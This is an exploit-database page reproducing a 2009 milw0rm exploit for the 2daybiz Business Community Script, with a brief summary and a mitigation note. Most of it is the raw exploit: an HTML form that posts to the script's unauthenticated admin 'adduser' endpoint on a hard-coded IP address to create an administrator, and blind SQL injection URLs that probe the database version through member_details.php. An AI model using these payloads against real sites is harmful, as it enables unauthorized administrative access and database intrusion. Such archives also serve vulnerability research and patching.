header-logo
Suggest Exploit
vendor:
Business Community Script
by:
TiGeR-Dz
7.5
CVSS
HIGH
Remote Blind SQL Injection
CWE
Product Name: Business Community Script
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

2daybiz Business Community Script (adminaddeditdetails.php) Add Admin / Remote Blind SQL Injection Exploit

The adminaddeditdetails.php script in the 2daybiz Business Community Script is vulnerable to a remote blind SQL injection attack. An attacker can exploit this vulnerability to gain unauthorized access to the application's database.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input validation and parameterized queries to prevent SQL injection attacks. Regularly updating the script to the latest version is also advised.
Source

Exploit-DB raw data:

-------------------------------------------------------------------------------------------------------------
2daybiz Business Community Script (adminaddeditdetails.php) Add Admin / Remote Blind SQL Injection Exploit 
----------------------------------------------------------------------------------------------------
Founder: TiGeR-Dz
Script:Business Community Script
Home:http://www.2daybiz.com/
Download:http://www.2daybiz.com/business_comm_download.html
--------------------------------------------------------------------------------------------------
1/Add Admin Exploit:
----------------------------------------------------------------
<p align="center">
  <body bgcolor="#000000">

  </p>

  <p>&nbsp;</p>
  <p><font size="5" color="#FF0000">CoD3d By </font>
  <font color="#FFFFFF" size="5">:TiGeR.dZ</font></p>
  <form id="form1" name="editinguser" method="post" action="http://98.131.92.231/products/businesscommunity/admin/adminaddeditdetails.php?adduser" onsubmit="return editvalidateform();">
  <table width="100%" border="0" align="center" cellpadding="5" cellspacing="0" class="blue_border">
  <tr>
  <td colspan="3"><div align="center" class="gblue_bg">
  <font size="5" color="#FF0000">Add 
  User </font> </div></td>
  </tr>
  <tr>
  <td colspan="3">&nbsp;</td>
  </tr>
  <tr>
  <td width="19%">&nbsp;</td>
  <td width="28%" align="left" class="yoda">
  <font color="#FF0000" size="4">Username</font></td>
  <td width="50%" align="left"><label>
  <input name="username" type="text" id="username" size="25" />
  </label> </td>
  </tr>
  <tr>
  <td class="yoda" width="19%">&nbsp;</td>
  <td align="left" class="yoda">
  <font color="#FF0000" size="4">Password</font></td>
  <td align="left"><label>
  <input name="password" type="password" id="password" size="25" />
  </label></td>
  </tr>
  <tr>
  <td class="yoda" width="19%">&nbsp;</td>
  <td align="left" class="yoda"> 
  <font color="#FF0000" size="4">Name </font> </td>
  <td align="left"><label>
  <input name="name" type="text" id="name" size="25" />
  </label></td>
  </tr>
  <tr>
  <td class="yoda" width="19%">&nbsp;</td>
  <td align="left" class="yoda">
  <font color="#FF0000" size="4">Email</font></td>
  <td align="left"><label>
  <input name="email" type="text" size="25" />
  </label></td>
  </tr>
  <tr>
  <td colspan="2" class="yoda">&nbsp;</td>
  <td>&nbsp;</td>
  </tr>
  <tr>
  <td colspan="3" class="yoda"><label>
  <div align="center">
  <input type="submit" name="Submit" value="Add User" />
  </div>
  </label></td>
  </tr>
   
  </html>
---------------------------------------------------------------------------------------------------------------------------------------------------
2/ Remote Blind SQL Injection Exploit:
------------------------------------------- 
Note: this gaps is Exist within the file of the control panel (adminaddeditdetails.php) :)
  
  1/http://98.131.92.231/products/businesscommunity/admin/member_details.php?mid=1+and+substring(@@version,1,1)=4 False

  2/http://98.131.92.231/products/businesscommunity/admin/member_details.php?mid=1+and+substring(@@version,1,1)=5 True
------------------------------------------------------------------------------------------------------------------------------------------
www.h4ckf0ru.com # 
-----------------------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2009-05-14]

Navigation

Suggest Exploit

Services By CQR